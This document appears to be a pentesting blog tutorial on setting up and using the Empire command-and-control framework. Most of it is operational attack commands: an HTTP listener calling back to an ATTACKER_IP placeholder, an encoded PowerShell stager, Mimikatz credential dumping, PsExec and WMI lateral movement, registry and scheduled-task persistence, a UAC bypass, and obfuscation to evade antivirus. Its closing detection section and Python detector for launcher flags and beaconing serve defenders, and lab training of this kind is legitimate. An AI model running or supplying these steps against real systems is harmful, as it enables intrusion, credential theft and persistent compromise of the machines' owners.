Ethical Hacking #empire #C2 #post-exploitation

Empire C2 Framework: Setup and Usage Guide for Pentesters

Learn how to set up and use the Empire post-exploitation C2 framework for authorized penetration testing labs.


Empire is a post-exploitation command-and-control (C2) framework built for penetration testers and red teamers. Originally developed as PowerShell Empire, the modern version supports Python and cross-platform agents. Empire enables testers to establish persistent access, move laterally, escalate privileges, and exfiltrate data — all through an encrypted communication channel — making it an essential tool for understanding advanced persistent threat (APT) techniques.

Important: Empire is a powerful offensive tool. Use it exclusively in authorized lab environments, CTFs, or penetration tests with explicit written permission.

Installation

Empire can be installed from source (a direct Python install) or run in Docker; Docker is the cleanest approach. From source:

# Clone the repository
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire

# Install with setup script
sudo ./setup/install.sh

# Start the server
sudo poetry run python empire/server/server.py

Or with Docker:

docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest

The Empire server runs on port 1337 by default. Access the web UI at http://localhost:5000 after starting.

Empire Architecture

Empire uses a client-server model:

Component           | Description
--------------------|--------------------------------------------------
Server              | Backend managing listeners, agents, and modules
Client (Starkiller) | Web UI for managing operations
Listener            | Waits for agent callbacks
Stager              | Generates the payload to deliver to the target
Agent               | Runs on the compromised machine and reports back
Module              | Post-exploitation tasks run on agents

Setting Up a Listener

In Starkiller (web UI) or the CLI, create an HTTP listener:

# CLI approach
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://ATTACKER_IP:80
(Empire: listeners/http) > set Port 80
(Empire: listeners/http) > execute

For HTTPS (recommended for evasion), configure a certificate:

(Empire: listeners/https) > set CertPath /path/to/cert.pem

Generating a Stager

With a listener running, generate a stager payload:

(Empire) > stagers
(Empire: stagers) > usestager multi/launcher
(Empire: stagers/multi/launcher) > set Listener http
(Empire: stagers/multi/launcher) > generate

This generates a PowerShell one-liner you can execute on the target:

powershell -noP -sta -w 1 -enc BASE64ENCODEDPAYLOAD

Other useful stagers:

  • windows/launcher_bat — BAT file
  • windows/macro — Office macro
  • multi/bash — Bash script for Linux targets
  • osx/safari_launcher — macOS Safari exploit

Working with Agents

Once a target executes the stager, an agent checks in:

# List all active agents
(Empire) > agents

(Empire: agents) > interact AGENT_NAME
(Empire: AGENT_NAME) > shell whoami
(Empire: AGENT_NAME) > shell hostname

Agent commands execute in memory without touching disk, making detection harder for endpoint security tools.

Post-Exploitation Modules

Empire includes hundreds of modules organized by function:

Situational Awareness

(Empire: AGENT_NAME) > usemodule situational_awareness/network/portscan
(Empire: AGENT_NAME) > usemodule situational_awareness/host/computerdetails

Credential Harvesting

# Dump credentials from memory (Mimikatz-style)
(Empire: AGENT_NAME) > usemodule credentials/mimikatz/logonpasswords
# SAM database extraction
(Empire: AGENT_NAME) > usemodule credentials/mimikatz/sam

Lateral Movement

# PsExec-style lateral movement
(Empire: AGENT_NAME) > usemodule lateral_movement/invoke_psexec
set ComputerName TARGET_HOSTNAME
set Listener http
execute

# WMI-based execution
(Empire: AGENT_NAME) > usemodule lateral_movement/invoke_wmi

Persistence

# Registry-based persistence
(Empire: AGENT_NAME) > usemodule persistence/elevated/registry
# Scheduled task
(Empire: AGENT_NAME) > usemodule persistence/elevated/schtasks

Privilege Escalation

# PowerUp — checks for common Windows privesc vectors
(Empire: AGENT_NAME) > usemodule privesc/powerup/allchecks
# Bypass UAC
(Empire: AGENT_NAME) > usemodule privesc/bypassuac_fodhelper

Bypassing Defenses (Lab Context Only)

Empire includes built-in obfuscation options for testing AV/EDR detection capabilities:

# Apply obfuscation to stager
(Empire: stagers/multi/launcher) > set Obfuscate True
(Empire: stagers/multi/launcher) > set ObfuscateCommand Token\All

This tests how well your organization’s detection stack catches common obfuscation patterns.

Detection and Defense

Understanding how Empire is detected helps defenders:

  • Network: Unusual outbound HTTP/HTTPS with periodic callbacks (beaconing). The default sleep is 5 seconds — detectable via NetFlow analysis
  • Host: PowerShell execution with -NoProfile -NonInteractive -WindowStyle Hidden flags; AMSI bypass attempts
  • Event Logs: Event ID 4104 (PowerShell Script Block Logging) captures Empire commands if properly configured

Enable PowerShell logging for detection:

Computer Configuration > Administrative Templates > Windows Components > PowerShell > Turn on Script Block Logging
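As an added example (not code from the original post or from the Empire project), here is a small Python detector for two of the indicators listed above: the abbreviated launcher switches of the stager one-liner, with the -EncodedCommand blob decoded so the script block itself can be inspected, and low-jitter callback gaps in per-pair flow timestamps. The switch list is a subset chosen for this demo, the scoring and jitter thresholds are assumptions, and all sample inputs in the test are constructed.

```python
import base64
import statistics

# Subset of powershell.exe switches, enough for this demo (assumption). powershell.exe accepts
# any unambiguous prefix, so -noP, -w and -enc must be expanded before string matching.
PS_PARAMS = ["-NoProfile", "-NonInteractive", "-WindowStyle", "-EncodedCommand",
             "-ExecutionPolicy", "-Sta", "-NoExit", "-Command"]

def expand_param(token: str) -> str:
    """Canonical switch for an abbreviation; the token itself if unknown or ambiguous."""
    hits = [p for p in PS_PARAMS if p.lower().startswith(token.lower())]
    return hits[0] if len(hits) == 1 else token

def encode_command(script: str) -> str:
    """-EncodedCommand carries the script as base64 of UTF-16LE text (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def analyze_cmdline(cmdline: str) -> dict:
    """Score a process command line (e.g. from Event ID 4688) for the launcher pattern."""
    tokens = cmdline.split()
    flags, script = set(), ""
    for i, tok in enumerate(tokens):
        if not tok.startswith("-"):
            continue
        canon = expand_param(tok)
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if canon == "-WindowStyle" and nxt.lower() in ("1", "hidden"):
            canon = "-WindowStyle Hidden"  # 1 is the numeric value of Hidden
        if canon == "-EncodedCommand" and nxt:
            script = base64.b64decode(nxt).decode("utf-16-le")  # inspect what actually runs
        flags.add(canon)
    suspicious = ("-NoProfile", "-NonInteractive", "-WindowStyle Hidden", "-EncodedCommand")
    score = sum(f in flags for f in suspicious)
    if "amsi" in script.lower():  # AMSI tampering inside the decoded script block
        score += 2
    return {"flags": sorted(flags), "script": script, "score": score}

def beacon_stats(timestamps: list) -> dict:
    """Mean gap and relative jitter between callbacks for one src->dst pair."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    mean = statistics.fmean(gaps) if gaps else 0.0
    jitter = statistics.pstdev(gaps) / mean if mean else 0.0
    return {"mean": mean, "jitter": jitter, "count": len(gaps)}

def is_beaconing(timestamps: list, min_callbacks: int = 6, max_jitter: float = 0.2) -> bool:
    """A fixed sleep (Empire's default is 5 s) shows up as many near-identical gaps."""
    s = beacon_stats(timestamps)
    return s["count"] >= min_callbacks and s["jitter"] <= max_jitter
```

Feed analyze_cmdline the CommandLine field of process-creation events and beacon_stats the sorted connection timestamps of each source/destination pair; an agent with jitter configured will widen the gaps, so treat the threshold as a tuning knob rather than a fixed rule.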

Lab Resources

Practice Empire in isolated environments:

  • GOAD (Game of Active Directory) — Multi-machine vulnerable AD environment
  • VulnAD — Simple vulnerable AD for practice
  • TryHackMe: Empire Red room

Empire is an advanced tool that mirrors real-world APT tradecraft. Using it in controlled labs builds deep familiarity with post-exploitation techniques that map directly to certifications like CRTO, CRTP, and OSCP Advanced.

#PowerShell #pentesting #post-exploitation #C2 #empire